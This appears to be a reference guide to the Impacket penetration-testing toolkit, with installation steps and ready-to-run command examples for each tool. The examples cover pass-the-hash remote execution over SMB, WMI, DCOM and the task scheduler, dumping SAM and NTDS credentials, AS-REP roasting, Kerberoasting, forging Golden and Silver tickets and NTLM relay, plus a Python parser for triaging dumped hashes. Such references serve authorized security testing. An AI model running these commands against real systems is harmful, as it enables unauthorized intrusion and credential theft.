Overview
Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols including SMB, MSRPC, and Kerberos. Impacket includes numerous ready-to-use tools for penetration testing, particularly focused on Windows environments.
⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
From PyPI
pip install impacket
From GitHub
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install
On Kali Linux
sudo apt update
sudo apt install -y python3-impacket
Using Virtual Environment
# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate # Linux/macOS
impacket-env\Scripts\activate.bat # Windows
# Install Impacket
pip install impacket
psexec.py
Executes commands on remote Windows systems over SMB by installing a temporary service, similar to Sysinternals' PsExec.
Basic Usage
psexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -k | Use Kerberos authentication |
| -no-pass | Don’t ask for password (useful for Kerberos) |
| -port [port] | Connect to SMB Server port (default: 445) |
| -debug | Turn DEBUG output ON |
Examples
# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe
# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe
# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe
smbexec.py
Similar to psexec.py but uses different techniques to execute commands, making it potentially stealthier.
Basic Usage
smbexec.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -share SHARE | Share where the output will be grabbed from (default: ADMIN$) |
| -shell-type {cmd,powershell} | Shell type to use (default: cmd) |
| -codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
| -service-name NAME | Service name to use (default: random) |
Examples
# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100
wmiexec.py
Executes commands on remote Windows systems using WMI.
Basic Usage
wmiexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -share SHARE | Share where the output will be grabbed from (default: ADMIN$) |
| -silentcommand | Execute command and return immediately without output |
| -codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
| -shell-type {cmd,powershell} | Shell type to use (default: cmd) |
Examples
# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100
# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
dcomexec.py
Executes commands on remote Windows systems using DCOM objects.
Basic Usage
dcomexec.py [domain/]username[:password]@target [options] [command]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -object {ShellWindows,ShellBrowserWindow,MMC20} | DCOM object to use (default: MMC20.Application) |
| -silentcommand | Execute command and return immediately without output |
| -codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
| -shell-type {cmd,powershell} | Shell type to use (default: cmd) |
Examples
# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100
# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100
# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
atexec.py
Executes commands on remote Windows systems using the Task Scheduler service.
Basic Usage
atexec.py [domain/]username[:password]@target [options] command
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -silentcommand | Execute command and return immediately without output |
| -codec CODEC | Sets encoding used (codec) from the target’s output (default: UTF-8) |
Examples
# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\temp\whoami.txt"
secretsdump.py
Extracts credentials from a remote Windows system, including SAM, LSA Secrets, and NTDS.dit.
Basic Usage
secretsdump.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -just-dc | Extract only NTDS.DIT data (domain controller only) |
| -just-dc-ntlm | Extract only NTDS.DIT NTLM hashes (domain controller only) |
| -just-dc-user USER | Extract only NTDS.DIT data for specific user |
| -pwd-last-set | Shows pwdLastSet attribute for each NTDS.DIT account |
| -user-status | Shows whether the user is enabled or disabled |
| -history | Dump password history |
| -outputfile FILE | Write output to file |
Examples
# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100
# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100
# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL
# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100
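The credential lines secretsdump.py prints (and writes with -outputfile) use the pwdump layout user:RID:LMHASH:NTHASH:::, and that is what gets triaged after an authorized dump. As an added example (not Impacket's own code), this parser reads constructed sample lines in that layout and flags empty-password accounts, accounts that still store a real LM hash, and accounts sharing an NT hash (password reuse); the sample user names and hash values are made up.

```python
import re
from collections import defaultdict

# Constructed sample in secretsdump.py's pwdump layout: DOMAIN\user:RID:LMHASH:NTHASH:::
# (the "(status=...)" suffix is the kind of annotation -user-status appends). Values are made up.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CONTOSO\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::
CONTOSO\\jdoe:1106:aad3b435b51404eeaad3b435b51404ee:e99a18c428cb38d5f260853678922e03::: (status=Enabled)
CONTOSO\\old_lm:1107:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash value when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)

def parse_dump(text: str) -> list:
    """Return one dict per credential line; banner and status lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["rid"] = int(e["rid"])
            e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
            entries.append(e)
    return entries

def triage(entries: list) -> dict:
    """Flag the findings a reviewer acts on first: blank passwords, LM hashes still present, reused NT hashes."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt_hash": {h: users for h, users in by_nt.items() if len(users) > 1},
    }
```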
GetNPUsers.py
Retrieves crackable AS-REP hashes for users with “Do not require Kerberos preauthentication” set (AS-REP Roasting).
Basic Usage
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Common Options
| Option | Description |
|---|---|
| -request | Requests TGT for users and output them in JtR/hashcat format |
| -no-pass | Don’t ask for password (useful for Kerberos) |
| -k | Use Kerberos authentication |
| -dc-ip IP | IP Address of the domain controller |
| -usersfile FILE | File with user per line to test |
| -format {hashcat,john} | Format to save the AS_REP responses (default: hashcat) |
| -outputfile FILE | Output filename to write ciphers in JtR/hashcat format |
Examples
# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request
# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1
# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat
# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass
GetUserSPNs.py
Lists accounts with Service Principal Names (SPNs) in the domain and can request their service tickets for offline cracking (Kerberoasting).
Basic Usage
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]
Common Options
| Option | Description |
|---|---|
| -request | Requests TGS for users and output them in JtR/hashcat format |
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -dc-ip IP | IP Address of the domain controller |
| -target-user USER | Target specific user to request TGS for |
| -outputfile FILE | Output filename to write ciphers in JtR/hashcat format |
| -format {hashcat,john} | Format to save the TGS tickets (default: hashcat) |
Examples
# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request
# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice
# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat
# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request
ticketer.py
Creates Golden and Silver Tickets for Kerberos authentication.
Basic Usage
ticketer.py [options] username
Common Options
| Option | Description |
|---|---|
| -nthash HASH | NT hash for the user or service account |
| -aesKey KEY | AES key for the user or service account |
| -domain DOMAIN | Domain name |
| -domain-sid SID | Domain SID |
| -spn SPN | Service Principal Name (for Silver Tickets) |
| -groups IDS | Comma-separated list of group IDs to include in the ticket |
| -duration HOURS | Ticket duration in hours (default: 10) |
| -out FILE | Output filename to save the ticket |
Examples
# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator
# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator
# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator
smbclient.py
Provides an SMB client to access shares and files on remote systems.
Basic Usage
smbclient.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -port [port] | Connect to SMB Server port (default: 445) |
| -file FILE | Input file with commands to execute in the mini shell |
| -debug | Turn DEBUG output ON |
Common Commands (Interactive Shell)
| Command | Description |
|---|---|
| help | Show available commands |
| shares | List available shares |
| use <share> | Connect to a specific share |
| ls | List files in current directory |
| cd <dir> | Change directory |
| get <file> | Download file |
| put <file> | Upload file |
| rm <file> | Delete file |
| mkdir <dir> | Create directory |
| rmdir <dir> | Remove directory |
| exit | Exit the shell |
Examples
# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100
# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
mssqlclient.py
Provides a client to interact with Microsoft SQL Server instances.
Basic Usage
mssqlclient.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -windows-auth | Use Windows Authentication (default: False) |
| -port [port] | Destination port to connect to (default: 1433) |
| -db DATABASE | MSSQL database instance (default: None) |
| -file FILE | Input file with commands to execute in the SQL shell |
| -debug | Turn DEBUG output ON |
Common Commands (Interactive Shell)
| Command | Description |
|---|---|
| help | Show available commands |
| enable_xp_cmdshell | Enable the xp_cmdshell stored procedure |
| disable_xp_cmdshell | Disable the xp_cmdshell stored procedure |
| xp_cmdshell <command> | Execute command through xp_cmdshell |
| sp_start_job <job> | Start a SQL Server job |
| exit | Exit the shell |
Examples
# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100
# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100
# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth
ntlmrelayx.py
Performs NTLM Relay attacks.
Basic Usage
ntlmrelayx.py [options]
Common Options
| Option | Description |
|---|---|
| -t TARGET | Target to relay the credentials to |
| -tf FILE | File with targets to relay the credentials to |
| -w | Start the HTTP server and do not relay credentials |
| -e FILE | Execute this file when a connection is relayed |
| -c COMMAND | Execute this command when a connection is relayed |
| -smb2support | Enable SMB2 support |
| -socks | Launch a SOCKS proxy for the connection |
| -one-shot | Relay only one connection |
| -debug | Turn DEBUG output ON |
Examples
# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support
# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support
# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\temp\whoami.txt"
# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d
# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks
lookupsid.py
Performs SID lookups to enumerate users and groups.
Basic Usage
lookupsid.py [domain/]username[:password]@target [options]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -domain DOMAIN | Domain to enumerate (default: target domain) |
| -debug | Turn DEBUG output ON |
Examples
# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100
# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100
# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
reg.py
Provides a remote registry manipulation tool.
Basic Usage
reg.py [domain/]username[:password]@target [options] action [params]
Common Options
| Option | Description |
|---|---|
| -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) |
| -debug | Turn DEBUG output ON |
Actions
| Action | Description |
|---|---|
| query | Query a registry key or value |
| add | Add a registry key or value |
| delete | Delete a registry key or value |
| save | Save a registry hive to a file |
Examples
# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\SOFTWARE\Test -v TestValue -vt REG_SZ -vd "Test Data"
# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\SOFTWARE\Test
Common Parameters (Shared Across Tools)
| Parameter | Description |
|---|---|
| -h, --help | Show help message and exit |
| -debug | Turn DEBUG output ON |
| -hashes LMHASH:NTHASH | NTLM hashes, format is LMHASH:NTHASH |
| -no-pass | Don’t ask for password (useful for Kerberos) |
| -k | Use Kerberos authentication |
| -aesKey KEY | AES key to use for Kerberos authentication |
| -dc-ip IP | IP Address of the domain controller |
| -target-ip IP | IP Address of the target machine |
| -port [port] | Destination port to connect to |
Resources